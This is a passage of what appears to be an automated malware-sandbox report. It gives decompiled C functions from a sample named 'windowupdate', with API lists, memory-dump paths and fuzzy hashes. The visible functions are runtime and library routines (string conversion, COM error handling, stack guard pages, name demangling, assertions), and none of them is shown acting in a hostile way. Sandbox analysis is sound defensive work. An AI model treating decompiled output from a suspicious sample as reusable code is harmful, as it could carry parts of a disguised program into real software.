                      								_t39 = E00D9E9E0(_a8);
                      								_t40 = E00D9EA90(_a8);
                      								_t68 = _a12;
                      								_v20 = E00D9E680(_a12, _a16, _a4, _t40, _t39);
                      								__eflags = _v20;
                      								if(_v20 != 0) {
                      									E00D9EF90(_a8, _v20 - 1);
                      									__eflags = 0;
                      									return 0;
                      								}
                      								E00D82F10(_t68, GetLastError());
                      								return  *((intOrPtr*)(L00D82F70(_t68)));
                      							}
                      							_v16 = E00D9E810(_a8, __eflags, _v8);
                      							__eflags = _v16;
                      							if(_v16 == 0) {
                      								goto L12;
                      							}
                      							return _v16;
                      						}
                      						E00D82F10(_t64, GetLastError());
                      						return  *((intOrPtr*)(L00D82F70(_t64)));
                      					}
                      					__eflags = E00D9E9E0(_a8);
                      					if(__eflags != 0) {
                      						L6:
                      						 *((short*)(E00D9EA90(_a8))) = 0;
                      						E00D9EF90(_a8, 0);
                      						return 0;
                      					}
                      					_v12 = E00D9E810(_a8, __eflags, 1);
                      					__eflags = _v12;
                      					if(_v12 == 0) {
                      						goto L6;
                      					}
                      					return _v12;
                      				}
                      				E00D9EF30(_a8);
                      				return 0;
                      			}











                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 70cd7fdd5a9bea23827917a2cb2885ea9f0d4b8c1660fac02e3c5c54bdd96db7
                      • Instruction ID: 016e3b595f621142a9ecc73318dcd5da49e48084dabc6da24bffb92658fea07d
                      • Opcode Fuzzy Hash: 70cd7fdd5a9bea23827917a2cb2885ea9f0d4b8c1660fac02e3c5c54bdd96db7
                      • Instruction Fuzzy Hash: 3A31F871A00209EFDF14EFA4D856BAE77B6EF44340F148969F51A9B295DB30AE40CB70
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D9D130(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				void* _t39;
                      				void* _t40;
                      				signed short* _t79;
                      
                      				if(_a4 != 0) {
                      					_t79 = _a4;
                      					__eflags =  *_t79 & 0x0000ffff;
                      					if(( *_t79 & 0x0000ffff) != 0) {
                      						_t65 = _a12;
                      						_v8 = E00D9E5E0(_a12, _a16, _a4, 0, 0);
                      						__eflags = _v8;
                      						if(_v8 != 0) {
                      							__eflags = _v8 - E00D9E9C0(_a8);
                      							if(__eflags <= 0) {
                      								L12:
                      								_t39 = E00D9E9C0(_a8);
                      								_t40 = E00D9EA70(_a8);
                      								_t70 = _a12;
                      								_v20 = E00D9E5E0(_a12, _a16, _a4, _t40, _t39);
                      								__eflags = _v20;
                      								if(_v20 != 0) {
                      									E00D9EF70(_a8, _v20 - 1);
                      									__eflags = 0;
                      									return 0;
                      								}
                      								E00D82F10(_t70, GetLastError());
                      								return  *((intOrPtr*)(L00D82F70(_t70)));
                      							}
                      							_v16 = E00D9E7A0(_a8, __eflags, _v8);
                      							__eflags = _v16;
                      							if(_v16 == 0) {
                      								goto L12;
                      							}
                      							return _v16;
                      						}
                      						E00D82F10(_t65, GetLastError());
                      						return  *((intOrPtr*)(L00D82F70(_t65)));
                      					}
                      					__eflags = E00D9E9C0(_a8);
                      					if(__eflags != 0) {
                      						L6:
                      						 *((char*)(E00D9EA70(_a8))) = 0;
                      						E00D9EF70(_a8, 0);
                      						return 0;
                      					}
                      					_v12 = E00D9E7A0(_a8, __eflags, 1);
                      					__eflags = _v12;
                      					if(_v12 == 0) {
                      						goto L6;
                      					}
                      					return _v12;
                      				}
                      				E00D9EEF0(_a8);
                      				return 0;
                      			}











                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 936af022869113efbc3e573bf349271d31dc18151dd6437b564b7f5fd6b08539
                      • Instruction ID: 48dcdd2715f21b0835b4de62a2ca5ed6a04df0a283b6ee5f78f6c2cf536c9b39
                      • Opcode Fuzzy Hash: 936af022869113efbc3e573bf349271d31dc18151dd6437b564b7f5fd6b08539
                      • Instruction Fuzzy Hash: 8031B771A00109EBDF14EFA4D855BAE77B6AF84304F108568F51A9B291DB30ED40DBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D9ADB0(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				void* _t39;
                      				void* _t40;
                      
                      				if(_a4 != 0) {
                      					if(( *_a4 & 0x0000ffff) != 0) {
                      						_t65 = _a12;
                      						_v8 = E00D9AFA0(_a12, _a16, _a4, 0, 0);
                      						if(_v8 != 0) {
                      							if(_v8 <= E00D9B130(_a8)) {
                      								L12:
                      								_t39 = E00D9B130(_a8);
                      								_t40 = E00D9B150(_a8);
                      								_t70 = _a12;
                      								_v20 = E00D9AFA0(_a12, _a16, _a4, _t40, _t39);
                      								if(_v20 != 0) {
                      									E00D9B1D0(_a8, _v20 - 1);
                      									return 0;
                      								}
                      								E00D82F10(_t70, GetLastError());
                      								return  *((intOrPtr*)(L00D82F70(_t70)));
                      							}
                      							_v16 = E00D9B0A0(_a8, _v8);
                      							if(_v16 == 0) {
                      								goto L12;
                      							}
                      							return _v16;
                      						}
                      						E00D82F10(_t65, GetLastError());
                      						return  *((intOrPtr*)(L00D82F70(_t65)));
                      					}
                      					if(E00D9B130(_a8) != 0) {
                      						L6:
                      						 *((char*)(E00D9B150(_a8))) = 0;
                      						E00D9B1D0(_a8, 0);
                      						return 0;
                      					}
                      					_v12 = E00D9B0A0(_a8, 1);
                      					if(_v12 == 0) {
                      						goto L6;
                      					}
                      					return _v12;
                      				}
                      				E00D9B190(_a8);
                      				return 0;
                      			}










                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 06dd12e7566a2fd0e7687461fd4864bbe860a371ab3b06f54dfbcbb7524106c0
                      • Instruction ID: 07f212be82e86e5d27f2a5625524150a6683afd11d78f62088c649ffe45d4a4f
                      • Opcode Fuzzy Hash: 06dd12e7566a2fd0e7687461fd4864bbe860a371ab3b06f54dfbcbb7524106c0
                      • Instruction Fuzzy Hash: 25311C71A0010DAFDF04EF68E956BAE77B5EF84750F108529F919AB291DB30AD40CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 55%
                      			E00D44C30(void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
                      				char _v40;
                      				char _v52;
                      				intOrPtr _v60;
                      				void* _v68;
                      				char _v72;
                      				void* _t36;
                      				intOrPtr* _t59;
                      				void* _t64;
                      				void* _t65;
                      				void* _t71;
                      				void* _t72;
                      				void* _t73;
                      
                      				_t64 =  &_v72;
                      				memset(_t64, 0xcccccccc, 0x11 << 2);
                      				_t73 = _t72 + 0xc;
                      				_t65 = _t64 + 0x11;
                      				if(_a20 != 0) {
                      					__imp__#8(_a20);
                      					E00DC1520(_a20, _t73 - _t73);
                      				}
                      				E00D4AF80(_t65,  &_v40, 0, 0x20);
                      				_t74 = _t73 + 0xc;
                      				_v52 = 0xffffffff;
                      				_t59 =  *((intOrPtr*)( *_a4 + 0x18));
                      				_v60 = E00DC1520( *_t59(_a4, _a8, 0xdc6390, 0x400, _a12 & 0x0000ffff, _a16, _a20,  &_v40,  &_v52), _t73 + 0xc - _t73 + 0xc);
                      				if(_v60 < 0) {
                      					_v68 = 0;
                      					if(E00D47100( &_v40,  &_v40,  &_v68) >= 0) {
                      						__imp__#201(0, _v68);
                      						E00DC1520(_t39, _t74 - _t74);
                      						_t59 = _v68;
                      						E00DC1520( *((intOrPtr*)( *((intOrPtr*)( *_v68 + 8))))(_t59), _t74 - _t74);
                      					}
                      				}
                      				_push(_t59);
                      				_push(_v60);
                      				E00DC14C0(_t71, 0xd44d24);
                      				_pop(_t36);
                      				return E00DC1520(_t36, _t71 - _t74 + 0x44);
                      			}
















                      APIs
                      • VariantInit.OLEAUT32(00000000), ref: 00D44C53
                      • _com_handle_excepinfo.COMSUPP ref: 00D44CC9
                      • SetErrorInfo.OLEAUT32(00000000,00000000,?,00000000), ref: 00D44CDA
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D44D0B
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckErrorInfoInitStackVariantVars@8_com_handle_excepinfo
                      • String ID:
                      • API String ID: 2090126287-0
                      • Opcode ID: 2007fecaffce73e08edcb41ec7032f8118fe9630cf9b6a29d52d2acbd5d38d6b
                      • Instruction ID: 5e5b514ebeb03c4511398926d3687924ce02650513ca8c6653497f96ece6a8e5
                      • Opcode Fuzzy Hash: 2007fecaffce73e08edcb41ec7032f8118fe9630cf9b6a29d52d2acbd5d38d6b
                      • Instruction Fuzzy Hash: F3312976A00229ABCB10EF98D882FDE73B9EB88350F144218F905A7291D630ED458BF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E00D5B663(void* __edx) {
                      				signed int _v8;
                      				char _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				long _v24;
                      				struct _MEMORY_BASIC_INFORMATION _v52;
                      				struct _SYSTEM_INFO _v88;
                      				void* _v100;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t18;
                      				void* _t20;
                      				void* _t22;
                      				char _t24;
                      				long _t30;
                      				signed int _t37;
                      				void* _t41;
                      				void* _t42;
                      				signed int _t44;
                      				long _t46;
                      				char _t47;
                      				signed int _t50;
                      				void* _t51;
                      
                      				_t41 = __edx;
                      				_t18 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t18 ^ _t50;
                      				_t20 = 4;
                      				E00DBED10(_t20);
                      				_t22 = _t51;
                      				_v16 = _t22;
                      				if(VirtualQuery(_t22,  &_v52, 0x1c) == 0) {
                      					L12:
                      					_t24 = 0;
                      				} else {
                      					_v20 = _v52.AllocationBase;
                      					GetSystemInfo( &_v88);
                      					_t37 = _v88.dwPageSize;
                      					_t47 = 0;
                      					_v12 = 0;
                      					if(E00D94000( &_v12) != 0 && _v12 > 0) {
                      						_t47 = _v12;
                      					}
                      					_t44 =  ~_t37;
                      					_t46 = _t47 - 0x00000001 + _t37 & _t44;
                      					if(_t46 != 0) {
                      						_t46 = _t46 + _t37;
                      					}
                      					_t30 = _t37 + _t37;
                      					if(_t46 < _t30) {
                      						_t46 = _t30;
                      					}
                      					_t42 = (_t44 & _v16) - _t46;
                      					if(_t42 < _v20 + _t37 || VirtualAlloc(_t42, _t46, 0x1000, 4) == 0 || VirtualProtect(_t42, _t46, 0x104,  &_v24) == 0) {
                      						goto L12;
                      					} else {
                      						_t24 = 1;
                      					}
                      				}
                      				return E00D47280(_t24, _t37, _v8 ^ _t50, _t41, _t42, _t46);
                      			}




























                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00D5B68C
                      • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00D5B6A0
                      • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 00D5B6F0
                      • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 00D5B705
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Virtual$AllocInfoProtectQuerySystem
                      • String ID:
                      • API String ID: 3562403962-0
                      • Opcode ID: 99964fae8bfbe0bb80b3c9a858099a8255afd7493c79aaccae4bf60cca3f0d1b
                      • Instruction ID: 82d52ee940c9226bab2cabacbfeed0190cde2436b457788e90c054abdda40d91
                      • Opcode Fuzzy Hash: 99964fae8bfbe0bb80b3c9a858099a8255afd7493c79aaccae4bf60cca3f0d1b
                      • Instruction Fuzzy Hash: C2214172E00219ABDF209BA59C85EEEB7B8EF44755F190526AD05E7241E7709904CAB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D56980(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				char _v12;
                      				intOrPtr _v16;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char* _t18;
                      				void* _t22;
                      				char* _t25;
                      				intOrPtr _t46;
                      				intOrPtr _t51;
                      				intOrPtr _t52;
                      				char* _t53;
                      
                      				_t18 =  *0xf20640; // 0x0
                      				if( *_t18 != 0) {
                      					E00D4F270( &_v12, 0x26);
                      					E00D4FD40( &_v12, E00D575A0(__ebx, __edi, __esi, __eflags,  &_v28));
                      					_t22 = E00D5A6C0( &_v12);
                      					__eflags = _t22;
                      					if(_t22 == 0) {
                      						L6:
                      						E00D4F350(_a4, 2);
                      						return _a4;
                      					}
                      					_t25 =  *0xf20640; // 0x0
                      					__eflags =  *_t25 - 0x40;
                      					if( *_t25 != 0x40) {
                      						goto L6;
                      					}
                      					_t51 =  *0xf20640; // 0x0
                      					_t52 = _t51 + 1;
                      					 *0xf20640 = _t52;
                      					_v20 = E00D50060("::", 2);
                      					_v16 = _t52;
                      					E00D4FCA0( &_v12,  &_v20);
                      					E00D4FD40( &_v12, E00D5A1E0(__ebx, __edi, __esi,  &_v36, 0, 0));
                      					_t53 =  *0xf20640; // 0x0
                      					__eflags =  *_t53 - 0x40;
                      					if( *_t53 != 0x40) {
                      						goto L6;
                      					}
                      					_t46 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t46 + 1;
                      					E00D4F240(_a4,  &_v12);
                      					return _a4;
                      				}
                      				E00D4F350(_a4, 1);
                      				return _a4;
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D56997
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::isValid.LIBCMTD ref: 00D569C6
                      • Mailbox.LIBCMTD ref: 00D56A4D
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$MailboxName::Name::isNode::makeStatusValid
                      • String ID:
                      • API String ID: 3478594962-0
                      • Opcode ID: 8558d1290fdc147575103a53a26ffd621e78bfba342a522b91c8ef0a20c4fc85
                      • Instruction ID: 34610b98329929f7d86bd8d531747bae1a611d84bb248dfccd2b27949299ff7f
                      • Opcode Fuzzy Hash: 8558d1290fdc147575103a53a26ffd621e78bfba342a522b91c8ef0a20c4fc85
                      • Instruction Fuzzy Hash: D32156B1900118ABDF14EF54DC92EAE7B74EF50305F444168FD1A6B192EB70AA55CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D55B40(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				char _v12;
                      				char _v20;
                      				char* _t12;
                      				intOrPtr _t20;
                      				char* _t30;
                      
                      				_t12 =  *0xf20640; // 0x0
                      				if( *_t12 != 0) {
                      					E00D586C0(__ebx, __edi, __esi,  &_v12);
                      					E00D4FDE0( &_v12, 0x2e);
                      					E00D4FD40( &_v12, E00D5A1E0(__ebx, __edi, __esi,  &_v20, 0, 0));
                      					_t30 =  *0xf20640; // 0x0
                      					if( *_t30 != 0x40) {
                      						E00D4F350(_a4, 2);
                      						return _a4;
                      					}
                      					_t20 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t20 + 1;
                      					E00D4F240(_a4,  &_v12);
                      					return _a4;
                      				}
                      				E00D4F350(_a4, 1);
                      				return _a4;
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D55B57
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::operator+=.LIBCMTD ref: 00D55B72
                      • Mailbox.LIBCMTD ref: 00D55BB2
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$MailboxName::Name::operator+=Node::makeStatus
                      • String ID:
                      • API String ID: 481169399-0
                      • Opcode ID: dad1ff594e516941f4c8bcb0fd7610676d80a11af8728140ed287055cdf95afb
                      • Instruction ID: 6a39b2770ce64c0af7f3dd9e0b6c82932ce72f1dc3b6db3855718190c31f9fec
                      • Opcode Fuzzy Hash: dad1ff594e516941f4c8bcb0fd7610676d80a11af8728140ed287055cdf95afb
                      • Instruction Fuzzy Hash: 25014075A00208ABEF14EF54DC96FAE3B74EB40305F044068FC0A5B2A6DB71BA55CBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E00D36860(intOrPtr __ecx, void* __esi, void* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				void* _t19;
                      				void* _t20;
                      
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if(_a4 != 0) {
                      					_v12 = E00DC1520(HeapFree( *(_v8 + 4), 0, _a4), _t20 - _t20);
                      					_t24 = _v12;
                      					if(_v12 == 0) {
                      						_t10 = L00D84930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlmem.h", 0x9a, 0, "%ls", L"bSuccess");
                      						_t20 = _t20 + 0x18;
                      						if(_t10 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				}
                      				return E00DC1520(_t10, _t19 - _t20 + 8);
                      			}

                      APIs
                      • HeapFree.KERNEL32(?,00000000,00000000), ref: 00D3688D
                      Strings
                      • %ls, xrefs: 00D368A8
                      • bSuccess, xrefs: 00D368A3
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h, xrefs: 00D368B4
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h$bSuccess
                      • API String ID: 3298025750-1732559737
                      • Opcode ID: 4a47c7b0b44d082be9e077b86492aec05f680576a44765a6e1ac0302c3600ab1
                      • Instruction ID: e63b68db9e0cc1aaded51776728e536dc8e5a0e0dafdb47d3d27ea40e9e8d5bd
                      • Opcode Fuzzy Hash: 4a47c7b0b44d082be9e077b86492aec05f680576a44765a6e1ac0302c3600ab1
                      • Instruction Fuzzy Hash: 60F0C275E40319BFCB20BB98DC47F9DB7349B04B01F148199E9052B2C2E2B1DA8487F2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E00D438E0(void* __esi, CHAR* _a4) {
                      				void* _t5;
                      				CHAR* _t7;
                      				char* _t8;
                      				void* _t16;
                      				void* _t17;
                      
                      				do {
                      					_t18 = _a4;
                      					if(_a4 == 0) {
                      						_t5 = L00D84930(_t18, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcore.h", 0x226, 0, "%ls", L"p != 0");
                      						_t17 = _t17 + 0x18;
                      						if(_t5 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				if( *_a4 != 0) {
                      					_t7 = CharNextA(_a4);
                      					__eflags = _t17 - _t17;
                      					_t8 = E00DC1520(_t7, __eflags);
                      				} else {
                      					_t8 =  &(_a4[1]);
                      				}
                      				return E00DC1520(_t8, _t16 - _t17);
                      			}

                      Strings
                      • %ls, xrefs: 00D438EF
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcore.h, xrefs: 00D438FB
                      • p != 0, xrefs: 00D438EA
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcore.h$p != 0
                      • API String ID: 0-1831341932
                      • Opcode ID: 4816ff988f264c2e6cdec067eecfe3d14c90b2def01feb9287835688530870e5
                      • Instruction ID: 84a305e8407936c26acf9c91478816a6af1fe1641c0b5b234e70f37289d93c0f
                      • Opcode Fuzzy Hash: 4816ff988f264c2e6cdec067eecfe3d14c90b2def01feb9287835688530870e5
                      • Instruction Fuzzy Hash: 23F05C316403657BDE207B18DC43F6D7758DB06784F140419F909AA282E2B2EFC08BF6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00DBD00B(void* _a4, long _a8, DWORD* _a12) {
                      				void* _t13;
                      
                      				_t13 = WriteConsoleW( *0xdf68e0, _a4, _a8, _a12, 0);
                      				if(_t13 == 0 && GetLastError() == 6) {
                      					E00DBCFF4();
                      					E00DBCFB6();
                      					_t13 = WriteConsoleW( *0xdf68e0, _a4, _a8, _a12, _t13);
                      				}
